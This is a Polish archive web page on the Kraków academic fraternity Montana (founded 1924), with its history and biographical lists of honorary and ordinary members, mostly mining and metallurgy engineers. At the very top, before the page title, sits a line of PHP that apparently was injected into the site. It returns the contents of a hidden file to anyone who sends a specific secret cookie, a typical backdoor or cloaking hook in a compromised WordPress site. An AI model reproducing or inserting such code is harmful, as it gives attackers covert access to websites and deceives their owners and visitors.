if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Montana

Dekiel prof. Stanisława Komorowskiego. Nazwa:
Polska Korporacja Akademicka Montana
Siedziba:
Kraków
Data powstania:
29 XI 1924 r.
Barwy:
purpurowa – złota – czarna
Dewiza:
„Jednością silni”

Rys historyczny

Listownik Montany, 1931 r.

Montana została założona 29 XI 1924 r. z inspiracji członków organizacji i korporacji polskich działających przed I wojną światową w szkołach górniczych w austriackim Leoben i niemieckim Freibergu Saskim.

Sztandar Montany.

Członkami Korporacji byli studenci Wydziału Górniczego i Wydziału Hutniczego Akademii Górniczej oraz słuchacze innych krakowskich szkół wyższych. W wyniku „reform” jędrzejewiczowskich od 1934 r. Montana ograniczyła swoją działalność ściśle do Akademii Górniczej.

Montana, dziedziniec Collegium Maius, Kraków wiosna (?) 1938 r.

Od 1925 r. należała do Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: 9 II 1925 r.). Kandydowała pod opieką K! Gnomia. Dnia 26 III 1926 r. uzyskała prawa członka rzeczywistego Związku. Związek filistrów pod nazwą „Śląskie Koło Filistrów” funkcjonował na Śląsku. W 1934 r. z okazji X-lecia istnienia ufundowano sztandar Korporacji.

Pod opieką Montany w Związku Polskich Korporacji Akademickich kandydowała K! Vratislavia.

Poczet sztandarowy Montany, krakowskie Błonia, 3 V 1938 r.

Kuratorami Korporacji z ramienia uniwersyteckiego Senatu byli w 1931 r. prof. Oskar Nowotny i prof. Stanisław Maziarski, a w 1938 r. prof. Oskar Nowotny. Siedziba Montany mieściła się w 1931 r. przy Rynku Głównym 13 p. III, a w 1938 r. przy ul. Garncarskiej 1.

Całkowita ustalona, choć niekompletna imienna lista członków obejmuje 101 nazwisk, w tym 10 członków honorowych. W 1938 r. liczyła 84 członków, w tym siedmiu członków honorowych.

Brak wiadomości dotyczących powojennej działalności Korporacji i spotkań jej członków.

Lista członków

Poniższa, niekompletna lista członków Montany obejmuje ponad 100 nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

 1. Jerzy Komorowski, inż., Filister honorowy Montany
 2. Stanisław Kossuth, (1893 w Myszkowie -1969) s. Aleksandra, student chemii w Liege, student i absolwent 1919 Wyższej Szkoły Górniczej w Przybramie, żołnierz I Brygady Legionów, pracował w górnictwie Zagłębia Dąbrowskiego i Śląska, od 1926 naczelnik Okręgowego Urzędu Górniczego, a w końcu lat 30-tych naczelnik Wydziału Węglowego w Departamencie Górniczym Ministerstwa Przemysłu i Handlu, Filister honorowy Montany, po wojnie sekretarz generalny, zastępca naczelnego dyrektora i członek Rady Techniczno-Gospodarczej w Centralnym Zarządzie Przemysłu, organizator oraz przewodniczący prezydium Stowarzyszenia Inżynierów i Techników Polskiego Przemysłu Węglowego, w latach 30-tych redaktor naczelny “Przeglądu Górniczo-Hutniczego” a po 1945 redaktor “Przeglądu Górniczego”, docent odznaczony m.in. Krzyżem Virtuti Militari, dwukrotnie Krzyżem Walecznych, Krzyżem Niepodległości
 3. Piotr Król, ( - przed 1938), inż., Filister honorowy Montany, w 1931 w Krakowie
 4. Tadeusz Lewalski, inż., Filister honorowy Montany, w 1938 pracownik kopalni “Barbara” w Chorzowie
 5. Stanisław Maziarski, (27 kwietnia 1873 w Tarnowie - 6 sierpnia 1956 w Krakowie) ojciec Kazimierza (Montana), student i absolwent med. UJ 1891-97, następnie studiował w Nancy i Monachium, od 1895 asystent w Katedrze Fizjologii UJ, dr med. UJ 1897, habilitacja UJ 1900, prof. nadzw. 1907, prof. zw. 1911, kierownik Katedry Histologii UJ 1907-51, czterokrotnie dziekan Wydziału Lekarskiego 1916/17 i 1922/25, rektor UJ 1933-36, od 1927 członek korespondent, a od 1930 członek czynny PAU, w czasie I wojny światowej lekarz w armii austriackiej, a następnie w WP, ppłk, Filister honorowy Montany i Vesalii, w 1931 r. i 1938 r. przewodniczący Koła Filistrów Montany, po wybuchu II wojny światowej aresztowany w ramach Sonderaktion Krakau, więzień Sachsenhausen, zwolniony, w czasie okupacji współorganizator i wykładowca tajnego Wydziału Lekarskiego, pochowany na Cmentarzu Rakowickim w Krakowie
 6. Lucjan Myciński dr, w 1931 generalny dyrektor Królewskiej Huty, a w 1938 Huty “Batory” w Wielkich Hajdukach, Filister honorowy Montany
 7. Oskar Nowotny, (28 listopada 1875 w miejsc. Trzyniec - 1972 w Rotenmann w Austrii) s. Ferdynanda, absolwent Szkoły Realnej w Cieszynie, student i absolwent Akademii Górniczej w Loeben 1894-98 (inż. górnik 1897, inż. hutnik 1898), po studiach m.in. inż. ruchu w hucie Vareś w Bośni, kopalni miedzi w Maskara w Bośni, hucie miedzi Sinjako, adiunkt w Katedrze Górnictwa Akademii Górniczej w Loeben 1901-14 oraz 1919-20, w I wojnie światowej por. kolejowy w armii austriackiej, prof. kontraktowy AG 1920-21, prof. zw. 1921-39, Filister honorowy Gnomii, kurator i Filister honorowy Montany, kierownik 1939 i referent 1939-44 w Statistisches Amt w Krakowie, po wojnie w Austrii, od 1945 na emeryturze
 8. Antoni Roman, (?), mgr, Filister honorowy Montany
 9. Józef Konstanty Tuchołka, (24 luty 1887 w miejsc. Rudy w pow. wrzesińskim - po 1959) s. Anastazego, absolwent Gimnazjum w Trzemesznie, student Akademii Górniczej we Freibergu 1908-10, członek Korporacji Sarmatia we Freibergu (?), student i absolwent Akademii Górniczej w Berlinie 1911-13, asystent ruchu w Sollberge Grufwor w Szwecji 1913-14, w I wojnie światowej ppor. w armii pruskiej, lotnik w eskadrze Richthofena 1914-18, doktorat Politechnika w Charlottenburgu 1917, po wojnie m.in. dyrektor kopalni “Huta Laura” w Siemianowicach 1928-32, kopalni “Anna” w Pszowie 1932-34, dyrektor Zarządu Przymusowego Kopalni Pszczyńskich 1935-39, Filister honorowy Montany, więziony przez Niemców 1942-44, naczelny dyrektor Gliwickiego Zjednoczenia Przemysłu Węglowego 1945-48, naczelny dyrektor Centrali Zaopatrzenia Przemysłu Węglowego w Katowicach 1949, dyrektor departamentu Ministerstwa Górnictwa i Energetyki w Katowicach 1950-58, wykładowca z organizacji gospodarki materiałowej AG 1945-47
 10. Józef Zwierzycki, (12 marca 1888 w Krobi - 1 maja 1961 we Wrocławiu) absolwent staroklasycznego Gimnazjum w Gnieźnie 1909, student Akademii Górniczej w Berlinie i na Uniwersytecie im. Fryderyka Wilhelma III w Berlinie 1909-13, dr filozofii 1913 (specjalność geologia), od 1914 eksplorator, a później dyrektor Holenderskiej Służby Geologicznej w Indiach Holenderskich, podróżował m.in. po Sumatrze, Jawie, Celebes, Borneo, Nowej Gwinei, Filister honorowy Montany, w 1938 wrócił do Polski, kierownik Wydziału Nafty i Soli w Państwowym Instytucie Geologicznym w Warszawie 1938-39, aresztowany w 1941 i osadzony na Pawiaku, więzień obozu koncentracyjnego Auschwitz 1941-42, później więziony w Niemczech, uciekł i do końca wojny ukrywał się w Krakowie, po zakończeniu wojny współtwórca Instytutu Nauk Geologicznych UWr. oraz wykładowca AGH, od 1948 prof. zw., badacz geologii Ziem Odzyskanych, autor koncepcji występowania złóż miedzi na obszarze przedsudeckim, co pozwoliło na odkrycie m.in. złóż miedzi koło Lubina, pochowany na cmentarzu św. Wawrzyńca we Wrocławiu, odznaczony m.in. Złotym Krzyżem Zasługi 1936 oraz holenderskim Krzyżem Oficerskim Orderu Oranje-Nassau 1938, od jego nazwiska nazwano plejstoceńskiego tygrysa szablozębnego z Jawy (Hemimachairodus zwierzyckii), w 1982 jego imię przyjęła Szkoła Podstawowa w Krobi, a we Wrocławiu jego pamięć upamiętniono Bulwarem Józefa Zwierzyckiego przy Instytucie Nauk Geologicznych UWr.

Członkowie rzeczywiści

 1. Ludwik Ballenstedt, (12 marca 1914 w Mannheim - koniec lat 80-tych) s. Adama (Mercuria), absolwent Gimnazjum im. Adama Mickiewicza w Poznaniu, ukończył VII kurs podchorążych artylerii w Szkole Podchorążych Rezerwy Artylerii we Włodzimierzu Wołyńskim 1932/33, odbył w lecie 1933 praktykę w 7 Dywizjonie Artylerii Kawalerii w Poznaniu w stopniu podchorążego rezerwy, student i absolwent Wydziału Górniczego AG 1933-45, akt. 1937-39, olderman 1938, sekretarz zewn. sem. let. 1938/39, prezes Krakowskiego Koła Międzykorporacyjnego sem. let. 1938/39 (ostatnie Prezydium przed wojną), od 1939 pracownik kopalń “Siemianowice” w Siemianowicach, “Mikulczyce” w Mikulczycach, “Postrowski” w Zabrzu, dyrektor kopalni “Rokitnica II” w Bytomiu 1952-54, “Bobrek” 1954-59, inspektor kopalń w Rybnickim Zjednoczeniu Przemysłu Węglowego 1959-61 oraz w Zjednoczeniu Przemysłu Węgla Brunatnego we Wrocławiu 1961-63, nadsztygar w kopalni “Julian” w Piekarach Śląskich 1963-64, od 1964 na emeryturze

  Źródła dodatkowe: uzupełnienia Paweł Janicki, www.7dak.pl

 2. Mieczysław Bartoszewski, student AG, c. 1930, akt. 1930-31
 3. Kazimierz Bereza,
 4. Mieczysław Blok, student AG, c. 1938, akt. 1938-39, sekretarz Krakowskiego Koła Międzykorporacyjnego sem. let. 1938/39 (ostatnie Prezydium przed wojną), prezes Młodzieży Wszechpolskiej AG 1939

  Andrzej Bolewski, 1936 r.

 5. Andrzej Bolewski, (17 lipca 1906 w Małogoszczu - 29 października 2002 w Krakowie ?) s. Jana, absolwent Gimnazjum Matematyczno-Przyrodniczego w Radomiu, student i absolwent Wydziału Górniczego Ag 1924-31, c. 192?, prezes sem. let. 1928/29 (?), sem. zim. 1929/30, 1930, prezes Krakowskiego Koła Międzykorporacyjnego sem let. 1929/30, od 1928 wykładowca AG, doktorat 1935, habilitacja 1939, uczestnik wojny obronnej 1939, więzień obozów koncentracyjnych Sachsenhausen i Dachau, prof. nadzw. 1946, prof. zw. 1950, kierownik Katedry Mineralogii i Petrografii 1953-69, prorektor AGH 1952 oraz 1961-64, prof. w Zakładzie Mineralogii i Geochemii Instytutu Mineralogii i Złóż Surowców Mineralnych 1969-76, organizator i prezes Centralnego Urzędu Geologii, autor licznych publikacji naukowych i dydaktycznych, dr honoris causa AGH i PŚ, członek PAN i PAU

 6. Tadeusz Chrzanowski, (10 stycznia 1916 w Moskwie - po 1975) s. Józefa, absolwent Gimnazjum Bolesława Chrobrego w Grudziądzu, student Wydziału Hutniczego AG 1937-48, c. 1938, akt. 1938-39, po wojnie w przemyśle hutniczym, kierownik wydziału Huty “Kościuszko” w Chorzowie 1948-53, główny inż. 1953-60 oraz dyrektor naczelny 1960-70 Huty “M. Nowotki” w Ostrowcu Świętokrzyskim, od 1975 kierownik Biura “Intermetall” Organizacji Współpracy w Zakresie Hutnictwa Żelaza Budapeszt
 7. Wojciech Cybulski, (1913 - ok. 2004) c. 1938, akt. 1938-39
 8. Wacław Czachórski, (17 luty 1905 w Złynce w Rosji -1994) s. Stanisława, absolwent IŻ Gimnazjum Matematyczno-Przyrodniczego Hoene Wrońskiego w Krakowie, student i absolwent Wydziału Górniczego AG 1924-36, akt. 1928-32, wiceprezes sem. let. 1928/29, prezes sem. zim. 1929/30, wiceprezes sem. zim. 1931/32, od 1936 pracował w kopalniach, m.in. Rudy Cynkowo-Ołowianej “Nowa Helena” w Szarlej Śląskiej, “Michał” w Michałkowicach, “Kozaki” w Złoczowie, po wojnie w Zjednoczeniu Przedsiębiorstw Wiertniczo-Górniczych w Katowicach, naczelny inż. Centralnego Zarządu Budownictwa Węglowego w Katowicach 1950-53, generalny dyrektor Ministerstwa Hutnictwa w Warszawie 1953-57, podsekretarz stanu Ministerstwa Przemysłu Ciężkiego w Warszawie 1957-63, zastępca przewodniczącego Komitetu Nauki i Techniki w Warszawie 1963-71, zastępca przewodniczącego Państwowej Rady Górniczej w Warszawie 1956-75
 9. Maksymilian Ćwikliński (po wojnie Max Clayton), (1912 - lata 90-te (?) w Londynie) c. 1934, akt. 1934-39, sekretarz 1938, absolwent AGH, inż. górnictwa i kolei liniowych, po wojnie na emigracji w Wielkiej Brytanii, konstruktor kolei linowych i prezes międzynarodowego towarzystwa kolei linowych
 10. Kazimierz Eisbrenner (Ejsbrenner, po wojnie Kazimierz Miłkowski), (30 listopada 1910 w Lublinie - 12 grudnia 1964 w Jaworznie) s. Jana, absolwent Gimnazjum Vetterów w Lublinie, student Wydziału Górniczego AG 1929-35, c. 1930, akt. 1930-31, po wojnie m.in. kierownik robót górniczych i zawiadowca w kopalni “Chwałowice” w Chwałowicach 1945-49, główny inż. planowania w Rybnickim Zjednoczeniu Przemysłu Węglowego 1949-53, naczelny dyrektor Zjednoczenia Przemysłu Węgla Brunatnego we Wrocławiu 1953-57, dyrektor ekonomicznego w Jaworznicko-Mikołowskim Zjednoczeniu Przemysłu Węglowego w Mysłowicach 1957-59, dyrektor ekonomiczny Dąbrowskiego Zjednoczenia Przemysłu Węglowego w Dąbrowie Górniczej 1959-61, dyrektor inwestycji Jaworznicko-Mikołowskiego Zjednoczenia Przemysłu Węglowego w Mysłowicach 1961-64, zginął w wypadku samochodowym
 11. Tadeusz Franiszyn, (12 sierpnia 1903 w Zimnowodzie - po 1967) s. Józefa, absolwent Szkoły Realnej w Tarnopolu, student i absolwent Wydziału Górniczego AG 1924-30, c. 1927, po studiach inż. ruchu w kopalni “Jowisz” w Wolkowicach 1934-39, w konspiracji w AK ps. “Jagoda” w kierownictwie informacji i propagandy (m.in. nakręcił pięć reportaży będących dokumentami zbrodni hitlerowskich), ekspert techniczny dla przemysłów maszynowego, górniczego, chemicznego, mineralnego i solnego w Banku Gospodarstwa Krajowego 1947-49 i Banku Inwestycyjnego w Krakowie 1949-51, generalny projektant w Biurze Projektów Górniczych w Krakowie 1951-67
 12. Roman Gapski, (7 sierpnia 1910 we Włocławku - ) absolwent Gimnazjum im. Bolesława Prusa, student i absolwent Wydziału Górniczego AG 1929-39, akt. 1938-39, uczestnik wojny obronnej 1939, w niewoli sowieckiej 1930-32, z Armią Andersa wydostał się z ZSRR na Środkowy Wschód, po wojnie na emigracji w Wielkiej Brytanii, a od 1952 w Kanadzie, inżynier w National Coal Board Yorkshire 1947-50, Simon and Carves Eng. Co. w Stockport 1950-52, w Steel Co. of Canada w Hamilton w Ontario 1952-54, Catalytic Construction of Canada w Toronto 1956-60, od 1960 starszy inż. w Departament of Public Works w Ottawie
 13. Andrzej Gąsiorowski, c. 1938, akt. 1938-39
 14. Stefan Goebel, student i absolwent WSH, akt. 1929-32, skarbnik sem. zim. 1929/30, sekretarz wewn. sem. let. 1930/31, skarbnik sem. zim. 1931/32, w 1938 w Krakowie
 15. Stanisław Gumowski, student AG, akt. 1930-39

  Czesław Hakiel, 1927 r. (?).

 16. Czesław Hipolit Hakiel, (13 sierpnia 1909 w Zosinie pow. Krasnystaw - 12 września 1998) s. Stanisława, absolwent Gimnazjum Matematyczno-Przyrodniczego J. Zamojskiego w Lublinie, student i absolwent Wydziału Górniczego AG 1927-48 (mgr inż. górniczy), akt. 1930-31, młodszy asystent 1935-39, asystent 1946-48 w Katedrze Wiertnictwa i Eksploatacji Nafty, adiunkt 1949-54, wykładowca 1958-67 oraz 1976- w Katedrze Kopalnictwa Naftowego AGH, adiunkt w Instytucie Naftowym w Krakowie 1969-76, dr inż., docent AGH i Politechniki Rzeszowskiej, pracownik Instytutu Geologicznego w Krakowie i Głównego Instytutu Górniczego w Katowicach, członek Stowarzyszenia Naukowo-Techn. Inżynierów i Techników Przemysłu Naftowego, Stowarzyszenia Wychowanków AGH, odznaczony Krzyżem Kawalerskim OOP, pochowany w Makowie Podhalańskim [Źródła (poza wskazanymi poniżej spisu członków): relacja Marty Wicherek]

  Andrzej Hermanowski, 1936 r.

 17. Andrzej Hermanowski, c. 1938, akt. 1938-39, w 1938 w Warszawie

 18. Julian Jakubiec, dr inż., w 1938 pracował w Studium Rolniczym w Krakowie
 19. Jerzy Janik, (16 sierpnia 1908 w Ujściu Solnym - prawd. po 1979) s. Romana, absolwent Gimnazjum Klasycznego w Kępnie, student i absolwent Wydziału Górniczego AG 1926-34, akt. 1930-31, po studiach pracował w kopalniach “Dębieńsko” w Czerwionce, “Siemianowice” w Siemianowicach, po wojnie m.in. dyrektor techniczny Zjednoczenia Budownictwa Montażowego Przemysłu Węglowego 1950-53, od 1954 dyrektor Przedsiębiorstwa Robót Górniczych w Wałbrzychu
 20. Dyonizy Jankowski, (21 września 1913 w Rogoźnie - prawd. po 1979) s. Tertuliana, absolwent Gimnazjum Staroklasycznego w Gostyninie, student i absolwent Wydziału Hutniczego 1935-47, c. 1938, akt. 1938-39, oficer rez., uczestnik wojny obronnej 1939, więzień oflagów VII A i IX A 1939-41, po wojnie m.in. kierownik wydziału usprawnień w Centralnym Zarządzie Przemysłu Hutniczego w Katowicach 1950-53, główny technolog Zakładów Przemysłu Metalowego w Poznaniu 1953-63, od 1963 kierownik sekcji ds. metalurgicznych i specjalista ds. metaloznawstwa Centralnego Biura Konstrukcyjnego Przemysłu Taboru Kolejowego
 21. Wiesław Jędrzejowski, (8 kwietnia 1906 w Krakowie - 1939 ?) absolwent III Gimnazjum w Krakowie, student i absolwent Wydziału Górniczego AG 1924-36, akt. 1929-31, sekretarz zewn. sem. zim. 1929/30, wiceprezes sem. let. 1930/31, referent w Ministerstwie Przemysłu i Handlu w Warszawie 1936-39, prawdopodobnie poległ w czasie wojny obronnej 1939
 22. Wojciech Kemnitz, (9 marca 1910 w Berlinie - ) s. Wojciecha, absolwent Gimnazjum Rocha Kowalskiego w Warszawie, student i absolwent Wydziału Hutniczego AG 1929-39, c. 1930, akt. 1930-39, sekretarz wewn. sem. zim. 1931/32, inż. ruchu w Fabryce Kabli w Płaszowie 1937-39, kierownik techniczny i kierownik kontroli technicznej Walcowni Metali “Warszawa” 1939-53, kierownik działu Zakładu odbioru Wyrobów Hutniczych w Warszawie 1953-56, kierownik centralnego laboratorium metali szlachetnych w Zakładach Materiałów Lampowych 1957-61, doradca techniczny Polskiego Komitetu Normalizacyjnego w Warszawie

  Jerzy Kłyszewski, 1938 r.

 23. Jerzy Kłyszewski, (31 września 1908 w Warszawie - 7 czerwca 1942 w Auschwitz) s. Antoniego, absolwent Gimnazjum Adama Mickiewicza w Warszawie, student i absolwent Wydziału Górniczego AG 1926-36, akt. 1929-32, gospodarz sem. zim. 1929/30, prezes Montany i prezes (sekretarz ?) Krakowskiego Koła Międzykorporacyjnego sem. let. 1929/30, olderman sem. zim. 1931/32, po studiach pracował w Kamieniołomach Staszów 1936-37 oraz kopalni “Orzeł Biały” w Brzezinach Śląskich 1937-39, aresztowany przez Gestapo na Śląsku w 1942, zesłany do Auschwitz, rozstrzelany w egzekucji na bloku XI za zamach na H. Heydricha w Pradze

  Stanisław Komorowski, 1938 r.

 24. Stanisław Komorowski, (1917-2007) student i absolwent AG, c. 1935, akt. 1935-39, wiceprezes 1938, prezes sem. let. 1938/39, prezes Krakowskiego Koła Międzykorporacyjnego, prof. UW, olderman 1993-95, 1995-97, 1997-99 oraz 1999-2001 Stowarzyszenia Filistrów Polskich Korporacji Akademickich

 25. Rudolf Konrad, student AG, akt. 1930-31
 26. Gerard Korek, (7 maja 1912 w miejsc. Rozdzień - ) absolwent Gimnazjum w Katowicach, student i absolwent Wydziału Górniczego AG 1932-39, akt. 1938-39, prezes 1938, inż. ruchu 1939 oraz asystent dyrektora 1939-44 w kopalni “Hr. Renard” w Sosnowcu, aresztowany przez Gestapo i osadzony w obozie koncentracyjnym w Dachau, po wyzwoleniu pracował w elektrowni k. Dachau
 27. Zygmunt Kosiewicz, student AG, c. 1930, akt. 1930-31
 28. Józef Kostecki, (18 marca 1906 we Lwowie - 14 września 1942 w Auschwitz) absolwent Szkoły Realnej w Tarnopolu, student i absolwent Wydziału Górniczego AG 1924-36, po studiach m.in. mierniczy górniczy w kopalni “Barbara” w Chorzowie oraz kopalni “Prezydent” w Chorzowie, aresztowany w 1942 i zesłany do Auschwitz (nr obozowy 34736)
 29. Zygmunt Kowalczyk, (29 maja 1908 w Porębie - prawd. po 1979) s. Franciszka, absolwent Gimnazjum Matematyczno-Przyrodniczego w Dąbrowie Górniczej, student i absolwent Wydziału Górniczego AG 1928-35, asystent w Katedrze Geodezji i Miernictwa Górniczego AG 1931-35, nauczyciel w Szkole Górniczo-Hutniczej w Dąbrowie Górniczej 1935-39 oraz Szkole Górniczo-Hutniczo-Mierniczej w Krakowie 1941-45, doktorat 1946, habilitacja 1946, prof. nadzw. 1948, prof. zw. 1956, dziekan Wydziału Geologiczno-Mierniczego AG 1948-51, rektor 1951-56, kierownik Katedry Geodezji Górniczej 1953-69, kierownik Zakładu Geodezji Górniczej 1969-73, prof. w Instytucie Geodezji PW 1973-78, od 1978 na emeryturze
 30. Jan Kownacki, (1916-1984) brat Włodzimierza (Montana), c. 1938, akt. 1938-39

  Włodzimierz Kownacki, 1938 r.

 31. Włodzimierz Kownacki, (1911-1982) brat Jana (Montana), akt. 1938-39, olderman sem. let. 1938/39

 32. Jerzy Krasnodębski, student AG, c. 1930, akt. 1930-35
 33. Jan Edward Antoni Kuntze, (28 kwietnia 1912 we Lwowie - 1980) absolwent Gimnazjum im. Mikołaja Kopernika w Katowicach, student i absolwent Wydziału Górniczego AG 1931-45, więziony przez Niemców na Montelupich 1939-40, po wojnie m.in. pracował w kopalniach “Siemianowice” w Siemianowicach, “Biskupice” w Zabrzu, “Miechowice” w Bytomiu, pracownik w Technikum Górniczym w Zabrzu, pracownik Głównego Instytutu Górnictwa w Katowicach
 34. Stanisław Lach, student i absolwent med. UJ, dr, w 1938 pracował w Szpitalu Hutniczym w Świętochłowicach
 35. Stanisław Langer, (18 września 1906 w Kałuszu - prawd. po 1979) s. Mirosława, absolwent VIII Gimnazjum Matematyczno-Przyrodniczego w Krakowie, student i absolwent Wydziału Górniczego AG 1924-32, akt. 1930-31, w 1938 dyrektor Izby Kontroli Państwa we Lwowie, dyrektor Szkoły Wiertniczej w Jaśle 1935-39, po wojnie m.in. kierownik Przedsiębiorstwa Górniczo-Wiertniczego w Krakowie 1946-48, kierownik grupy wiertniczej Spółdzielni Budowlanej w Krakowie 1948-50, kierownik grupy wiertniczej Spółdzielni Mierniczo-Górniczej w Krakowie 1950-51, kierownik pracowni dokumentalno-geologicznej Geologiczno-Wiertniczej Spółdzielni Pracy w Krakowie 1962-71, kierownik działu dokumentacji geologicznej i hydrogeologicznej Przedsiębiorstwa Technologiczno-Geologicznego Przemysłu Budowlanego w Krakowie 1964-71, od 1972 na emeryturze
 36. Tadeusz Piotr Laskowski, (18 października 1901 w Rudnikach - ) absolwent Gimnazjum im. Kazimierza Jagiellończyka w Kołomyi, student Wydziału Górniczego AG 1924-31, po studiach m.in. Pracownik kopalni “Rymer’ w Niedobczycach, “Anna” w Pszowie, kierownik przeróbki węgla w dyrekcji Rybnickiego Gwarectwa Węglowego 1937-39, więzień obozów koncentracyjnych w Buchenwaldzie, Mauthausen i Gusen 1939-40, kierownik Związku Plantatorów Tytoniu w Proszowicach 1941-45, po wojnie m.in. kierownik Wydziału Przeróbki Mechanicznej Centralnego Zarządu Przemysłu Węglowego w Katowicach 1945-50, naczelny dyrektor Instytutu Paliw Naturalnych w Katowicach 1948-50, prof. i rektor (1959-65) Politechniki Śląskiej w Gliwicach, doktorat AG 1948, od 1950 wykładowca PŚ w Gliwicach, m.in. organizator i kierownik Katedry Przeróbki Mechanicznej Kopalni 1950-69, prodziekan 1950-58, prof. nadzw. 1954, prof. zw. 1960, rektor 1959-65, od 1971 na emeryturze
 37. Leopold Leśniara, (26 kwietnia 1912 w Czechowicach - 1942 w Cieszynie) s. Wojciecha, absolwent Gimnazjum w Bielsku, student i absolwent Wydziału Górniczego AG 1930-37, c. 1930, akt. 1931-31, po studiach zastępca kierownika robót górniczych w kopalniach “Silesia” w Dziedzicach oraz “Zofiówka” w Porębie k. Orłowej, w konspiracji w AK, powieszony przez Niemców na rynku w Cieszynie
 38. Rufin Leśniewicz, c. 1930, akt. 1930-31, mgr, w 1931 w Chełmży
 39. Ryszard Leśniewicz, c. 1930, akt. 1930-31, mgr, w 1938 w Chełmży
 40. Ryszard Leśniewicz, dr med., w 1938 w Krakowie
 41. Józef Liptak, sekretarz wewn. sem. zim. 1929/30, dr, w 1938 w prokuraturze w Ostrowie Wielkopolskim
 42. Władysław Łucki, (7 sierpnia 1906 w Bochni - 7 sierpnia 1942 w Stanisławowie) student i absolwent AG, akt. 1930-31, olderman sem. let. 1930/31, w 1938 pracował w Izbie Kontroli Państwa we Lwowie, aresztowany przez Gestapo, zastrzelony w więzieniu w Stanisławowie
 43. Cyryl Majchrzak, (16 marca 1911 w Gierłatowie - 19 października 1977 w Myszkowie), s. Józefa, absolwent Gimnazjum w Inowrocławiu, student i absolwent Wydziału Górniczego AG 1931-38, po studiach pracował w Kopalni Soli Potasowej w Kałuszu 1938-39, uczestnik wojny obronnej 1939, więzień oflagu VII A Murnau 1939-45, po wojnie pracował m.in. w kopalniach “Bytom” w Bytomiu, “Chorzów” w Chorzowie, “Radzionków” w Radzionkowie, zastępca nacz. inż. kopalni “Knurów” w Knurowie, kierownik działu przygotowawczego a później działu technologicznego w kopalni “Szczygłowice” w Knurowie 1961-69, od 1969 na emeryturze
 44. Jerzy Majewski, student AG, akt. 1930-31, inż. w Hucie Pokój N. Bytom
 45. Lech Makowiecki, akt. 1938-39, po wojnie na emigracji, pracownik ONZ, prowadził prace geologiczne na całym świecie
 46. Zdzisław Mandat, c. 1938, akt. 1938-39, w 1938 w Piekarach Śląskich
 47. Kazimierz Stanisław Maziarski, (19 lipca 1905 w Krakowie - 1980) s. Stanisława (Montana), absolwent Gimnazjum IV Gimnazjum im. H. Sienkiewicza w Krakowie, student i absolwent Wydziału Hutniczego AG 1923-36, akt. 1930-31, po studiach pracownik m.in. Huty “Batory” w Hajdukach Wielkich/Chorzowie, m.in. szef działu technologicznego 1950-70
 48. Stanisław Aleksander Mianowski, (?) (21 lipca 1906 w Briańsku - 1 lipca 1940 w Olsztynie k. Częstochowy) s. Eugeniusza, absolwent Gimnazjum Matematyczno-Przyrodniczego w Królewskiej Hucie, student i absolwent Wydziału Górniczego AG 1926-35, po studiach inż. ruchu kopalni ropy naftowej “Potok” k. Krosna 1936-39, kierownik kopalni rudy żelaza “Konopiska” 1939-40, aresztowany przez Gestapo za sabotaż, rozstrzelany w masowej egzekucji
 49. Stanisław Milówka, w 1938 por. w Batalionie Telegraficznym WP w Krakowie

  Mieczysław Morozowski, lata 30-te.

 50. Mieczysław Mrozowski, (10 grudnia 1910 w Kucharach -1999) s. Romualda, absolwent Gimnazjum im. Juliusza Słowackiego w Kowlu, student i absolwent Wydziału Górniczego AG 1927-36, akt. 1930-31, sekretarz zewn. sem. let. 1930/31, po studiach pracownik kopalni “Ema” w Radlinie 1936-39, aresztowany 1 września 1939 przez Gestapo, więzień obozu koncentracyjnego w Buchenwaldzie 1939-45, po wojnie pracował w Zabrzańskim, a następnie Gliwickim Zjednoczeniu Przemysłu Węglowego, dyrektor, a następnie wiceprezes 1955-57 i prezes 1957-72 Centralnego Urzędu Geologii w Warszawie, p.o. Państwowej Rady Górnictwa 1972-76, od 1950 wykładowca PŚ, od 1970 prof. nadzw.

 51. Lech Neimitz, (1916-1997) c. 1938, akt. 1938-39
 52. Otto Niedziałkowski, mgr, w 1938 w Krakowie
 53. Edmund Nowicki - Osuch, (8 września 1909 w Skałowie - po 1976), s. Stanisława, absolwent Gimnazjum im. Hugo Kołłątaja w Krotoszynie, student i absolwent Wydziału Hutniczego 1929-47, c. 1930, akt. 1930-39, sekretarz 1938, po wojnie w przemyśle hutniczym, m.in. kierownik działu technicznego, starszy technolog sekcji planowania długofalowego, starszy technolog działu zaopatrzenia inwestycji oraz zespołu dostaw importowych w Hucie im. Lenina w Krakowie 1949-75
 54. Tadeusz Owsiak, (15 maja 1905 w Krośnie - prawd. po 1979) s. Wojciecha, absolwent IX Gimnazjum Matematyczno-Przyrodniczego w Kraków, student i absolwent Wydziału Górniczego AG 1926-37, akt. 1930-31, uczestnik wojny obronnej 1939, urzędnik administracyjny w Fabryce Metali w Łagiewnikach k. Krakowa 1939-45, dyrektor kopalni “Wieczorek” 1945, “Gottwald” 1949-50, “Wujek” w Katowicach 1951-53, “Wieczorek” 1954-56, naczelny inż. Przedsiębiorstwa Budowy Płytkich Kopalń w Katowicach 1956-60 oraz Zjednoczenia Budownictwa Górniczego w w Katowicach 1960-70, mgr ekonomii Wyższa Szkołą Ekonomiczna w Krakowie 1969, od 1970 na emeryturze
 55. Franciszek Paschek, (1918 - ) c. 1938, akt. 1938-39, skarbnik sem. let. 1938/39
 56. Leopold Paździora, c. 1938, akt. 1938-39
 57. Józef Piekarz, student UJ, akt. 1930-31
 58. Aleksander Piestrzyński, (26 luty 1911 w Łodzi - 6 kwietnia 1968 w Mont St. Aignan we Francji), s. Stanisława, absolwent Gimnazjum im. Bolesława Prusa w Sosnowcu, student i absolwent Wydziału Górniczego AG 1929-39, akt. 1938-39, uczestnik wojny obronnej 1939, w niewoli niemieckiej w obozie w Dössel oraz Sandbostal, w PSZ na Zachodzie 1945-46, pozostał na emigracji we Francji, student Wydziału Geologicznego Sorbony w Paryżu 1946, agent de maitrice w Centre de Recherches Societé des Fonderies de Pont-a-Mousson 1948-59, inż. Union Sidérurgigne Loraine “Sidelor” a Deville les Rouen 1959-68
 59. Janusz Pietrzykowski, c. 1938, akt. 1930-31
